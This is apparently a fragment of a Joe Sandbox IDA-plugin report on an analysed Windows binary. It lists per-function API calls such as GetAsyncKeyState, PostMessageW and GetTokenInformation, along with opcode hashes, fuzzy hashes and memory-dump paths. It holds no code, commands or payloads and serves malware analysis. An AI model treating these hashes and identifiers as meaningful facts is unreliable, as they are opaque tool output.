                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: 64ea96ae41a171efed25d4f1deb71d32610532b9f8fc8cd53fe7a1e6dc316966
                                          • Instruction ID: 6f14870f296476b086bd7a5ed2df02708a1e50c4146533424c033262cd133fc0
                                          • Opcode Fuzzy Hash: 64ea96ae41a171efed25d4f1deb71d32610532b9f8fc8cd53fe7a1e6dc316966
                                          • Instruction Fuzzy Hash: D2510D75A00105DFCB01EF64C981AAEBBF5EF49314F1480A5E819AB3A2CB31ED11DF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6cf144673e037e00ed2b2ad5174409019149f32f785b099fec0a860b13d07a48
                                          • Instruction ID: f3da8b22816040ef3e97c9e4c8dc632c7eb9594aab1c6220212b4671e04b94da
                                          • Opcode Fuzzy Hash: 6cf144673e037e00ed2b2ad5174409019149f32f785b099fec0a860b13d07a48
                                          • Instruction Fuzzy Hash: 47418235908104AFE720EF28CC5CFA9BBA8EB09310F150666F916A73E1C774AD51EB51
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00902357
                                          • ScreenToClient.USER32(009C57B0,?), ref: 00902374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00902399
                                          • GetAsyncKeyState.USER32(00000002), ref: 009023A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 2e5eafc80e45f7fed3d1a7887fae36e5f8d46b975370559e44eac0f200b72735
                                          • Instruction ID: 76f42237c6cd1cdb7f96bfe4d281c4d9d879739d8cfea9a604cd94c6ff5dce4e
                                          • Opcode Fuzzy Hash: 2e5eafc80e45f7fed3d1a7887fae36e5f8d46b975370559e44eac0f200b72735
                                          • Instruction Fuzzy Hash: 1C418F75608119FFCF199F68C848AE9FB79FB05764F20431AF829A62E0C7349950DF91
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009563E7
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00956433
                                          • TranslateMessage.USER32(?), ref: 0095645C
                                          • DispatchMessageW.USER32(?), ref: 00956466
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00956475
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: 734c5b14fa3930258b5aea0842addaf69d2ee2fd5e162f30c6460faf6f7b52b8
                                          • Instruction ID: 641b3d3240d6bfd89fc1701be0b490bb9c3120fa442295121b9e0f71379f1af0
                                          • Opcode Fuzzy Hash: 734c5b14fa3930258b5aea0842addaf69d2ee2fd5e162f30c6460faf6f7b52b8
                                          • Instruction Fuzzy Hash: 9431B231914646AFDB64CF72DC44FB67BACAB01302F940169E821C31B1E735A4CDE760
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00958A30
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00958ADA
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00958AE2
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00958AF0
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00958AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 09b4780c3e0680b0d7eecc4b820f6a27f5f29b594dcb3d75b704c3cbe7cbe266
                                          • Instruction ID: 59c3b44a881ed48b07bc3fec56995b1c581290ffd9a4463218e2ce386987718c
                                          • Opcode Fuzzy Hash: 09b4780c3e0680b0d7eecc4b820f6a27f5f29b594dcb3d75b704c3cbe7cbe266
                                          • Instruction Fuzzy Hash: 8A31EE71500219EBDF14CFA9D94CA9F3BB9EB04316F10822AFD25EB2D0C7B09918DB90
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0095B204
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0095B221
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0095B259
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0095B27F
                                          • _wcsstr.LIBCMT ref: 0095B289
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: a87ab60dc2abd4bebcfc4c5ac5939bf245d8da4b4514ff61e0df67dd5c98cf84
                                          • Instruction ID: 96336b56f7c98c7d92c3f10b2124ddd93a0cb5a16d781a28efcd0ac8ea28ed74
                                          • Opcode Fuzzy Hash: a87ab60dc2abd4bebcfc4c5ac5939bf245d8da4b4514ff61e0df67dd5c98cf84
                                          • Instruction Fuzzy Hash: AC21F532208214BAEB159B76AC09E7F7B9CDF99721F108129FC09DA1A1EF659C4097A0
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098B192
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0098B1B7
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0098B1CF
                                          • GetSystemMetrics.USER32(00000004), ref: 0098B1F8
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00970E90,00000000), ref: 0098B216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: c4636130f05ea28a24e1ca0b7ff24b1893a564bdd17381ad20aa9a4469f905eb
                                          • Instruction ID: 22c6939b249072fd4f742ef752636b90bcd871d6d53451aa84f043acfa677d53
                                          • Opcode Fuzzy Hash: c4636130f05ea28a24e1ca0b7ff24b1893a564bdd17381ad20aa9a4469f905eb
                                          • Instruction Fuzzy Hash: 5E219471928251AFCB10AF38DC18A6A37A8FB15321F194728F932D73E0D73098519B90
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00959320
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00959352
                                          • __itow.LIBCMT ref: 0095936A
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00959392
                                          • __itow.LIBCMT ref: 009593A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: 70e85c19a6495e373205f4bd279e5f0fa5534d030310c5ad1323baeb99d6c6b0
                                          • Instruction ID: a3132fab6754bf850ca9afe46114e1e3fd6b3b3bd2add5d37396198c6b209253
                                          • Opcode Fuzzy Hash: 70e85c19a6495e373205f4bd279e5f0fa5534d030310c5ad1323baeb99d6c6b0
                                          • Instruction Fuzzy Hash: BD21F531B00208FFEB10EBA19C89FAE7BACEB88725F044025FD44D72D0D6B09D499791
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00975A6E
                                          • GetForegroundWindow.USER32 ref: 00975A85
                                          • GetDC.USER32(00000000), ref: 00975AC1
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00975ACD
                                          • ReleaseDC.USER32(00000000,00000003), ref: 00975B08
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: de3e2b5600636f89ef640efe2804fcf2cebd5b60ad7e55bc93043f4299a0ab0c
                                          • Instruction ID: ae0df9c9e7fad43ff3ae8644fa4f165910e3e8956341e589ada230da8ba14573
                                          • Opcode Fuzzy Hash: de3e2b5600636f89ef640efe2804fcf2cebd5b60ad7e55bc93043f4299a0ab0c
                                          • Instruction Fuzzy Hash: 93219376A00204AFDB14EF65DC98B9ABBE5EF88310F14C579F849D7362DA70AD00DB90
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0090134D
                                          • SelectObject.GDI32(?,00000000), ref: 0090135C
                                          • BeginPath.GDI32(?), ref: 00901373
                                          • SelectObject.GDI32(?,00000000), ref: 0090139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 3ac95fd51ed0c54160048b0c613c82245e1f63c47efb678160cc336631511ee9
                                          • Instruction ID: 76f9c0f3743b3ec1cafe45b1840ae6921e3d658346d951eadb82f364e2847811
                                          • Opcode Fuzzy Hash: 3ac95fd51ed0c54160048b0c613c82245e1f63c47efb678160cc336631511ee9
                                          • Instruction Fuzzy Hash: 1C216A31C28708EFDB10DF25DC18B6A7BA8FB00361F654226F810961F0D771A891EF90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: 8584e354d77dfbc692ee0793e8e2919b357df8c43528a09e8683ba0974ae6b14
                                          • Instruction ID: 969a389f45fec1b0b77ae764ea7a875b3cbc74e8c361189a20db4357e17e5778
                                          • Opcode Fuzzy Hash: 8584e354d77dfbc692ee0793e8e2919b357df8c43528a09e8683ba0974ae6b14
                                          • Instruction Fuzzy Hash: B801B5B16001197BD604AB1AED42FBBB35CDEA1389B144421FD4996346FB54DE2483E4
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00964ABA
                                          • __beginthreadex.LIBCMT ref: 00964AD8
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00964AED
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00964B03
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00964B0A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: f1984e9b078462bbeee5565d5f598e6891fe08e0cd2826016fd1eca0b0925817
                                          • Instruction ID: 16504243c24be9b6ccf8d5f2f6c06cbd8f71431a20fb1bfc079202d6c71ed67f
                                          • Opcode Fuzzy Hash: f1984e9b078462bbeee5565d5f598e6891fe08e0cd2826016fd1eca0b0925817
                                          • Instruction Fuzzy Hash: E511E17691C618BBC7009BF8EC08A9F7BACEB45320F154269F825D3390D675994497A0
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0095821E
                                          • GetLastError.KERNEL32(?,00957CE2,?,?,?), ref: 00958228
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00957CE2,?,?,?), ref: 00958237
                                          • HeapAlloc.KERNEL32(00000000,?,00957CE2,?,?,?), ref: 0095823E
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00958255
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: be2c424d94d9d1975c9cc41c5bd89ca80ddeaa4f896027d6b430faa17ea3b5e9
                                          • Instruction ID: d67a97e4d298a66a51eda7a226f3cb0dc9e2932726150f307059753f2ba953c5
                                          • Opcode Fuzzy Hash: be2c424d94d9d1975c9cc41c5bd89ca80ddeaa4f896027d6b430faa17ea3b5e9
                                          • Instruction Fuzzy Hash: EF0162B1218604BFDB108FA6EC58D677F6CFF85795B500529FC19D2220DA318C14DB60
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?,?,00957455), ref: 00957127
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957142
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957150
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?), ref: 00957160
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 0095716C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: c6a035bea431a4cd3fa7e527f0765f30d090e1c64adcd419976dbd49ee98bca9
                                          • Instruction ID: 30b01cf2ab6e47fed17d7bf9086864c7de614c812773cc224c446588d9d76caf
                                          • Opcode Fuzzy Hash: c6a035bea431a4cd3fa7e527f0765f30d090e1c64adcd419976dbd49ee98bca9
                                          • Instruction Fuzzy Hash: 36018472619618BBDB118FA6EC44BAABBADEF44792F140068FD05D2310D731DE449BA0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00965260
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0096526E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00965276
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00965280
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009652BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 9edf88af9e63dc4b086954fd2e503dae15e5a1a684991b51b793a580344dabf1
                                          • Instruction ID: 3a86a2d9239962f5b193e32670671606ade3e243f8cf6dca5b4eb000b30cd9e5
                                          • Opcode Fuzzy Hash: 9edf88af9e63dc4b086954fd2e503dae15e5a1a684991b51b793a580344dabf1
                                          • Instruction Fuzzy Hash: A6015731D19A2DDBCF00EFE4ECA8AEDBB78BB49711F420456E951F2240CB3455509BA1
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00958121
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095812B
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095813A
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00958141
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00958157
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 46ac935b6ed997d7f4f6fbd67f9508322eed0272f55af13feabe196b15a7372a
                                          • Instruction ID: 3ec4018ef33ff454566e94ddbb25d0e63f6941d0a464b1a8dfd9259ce7d680a7
                                          • Opcode Fuzzy Hash: 46ac935b6ed997d7f4f6fbd67f9508322eed0272f55af13feabe196b15a7372a
                                          • Instruction Fuzzy Hash: 13F0C2B0218704AFEB114FA6EC9CE673BACFF49755B100025F946D2250DB609C05EB60
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0095C1F7
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0095C20E
                                          • MessageBeep.USER32(00000000), ref: 0095C226
                                          • KillTimer.USER32(?,0000040A), ref: 0095C242
                                          • EndDialog.USER32(?,00000001), ref: 0095C25C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 8acd5e4e85c171983399b2f4085aca909b7dd835749af7f233e75893a7a0826c
                                          • Instruction ID: 6c303caab0fdbaf2bd009ce692d4870009d9b7546df5dda874b9acc8cffd5a87
                                          • Opcode Fuzzy Hash: 8acd5e4e85c171983399b2f4085aca909b7dd835749af7f233e75893a7a0826c
                                          • Instruction Fuzzy Hash: BF01DB70414708AFEB209B51ED5EF96777CFF00706F000669F952E15E0DBF4A9889B50
                                          APIs
                                          • EndPath.GDI32(?), ref: 009013BF
                                          • StrokeAndFillPath.GDI32(?,?,0093B888,00000000,?), ref: 009013DB
                                          • SelectObject.GDI32(?,00000000), ref: 009013EE
                                          • DeleteObject.GDI32 ref: 00901401
                                          • StrokePath.GDI32(?), ref: 0090141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
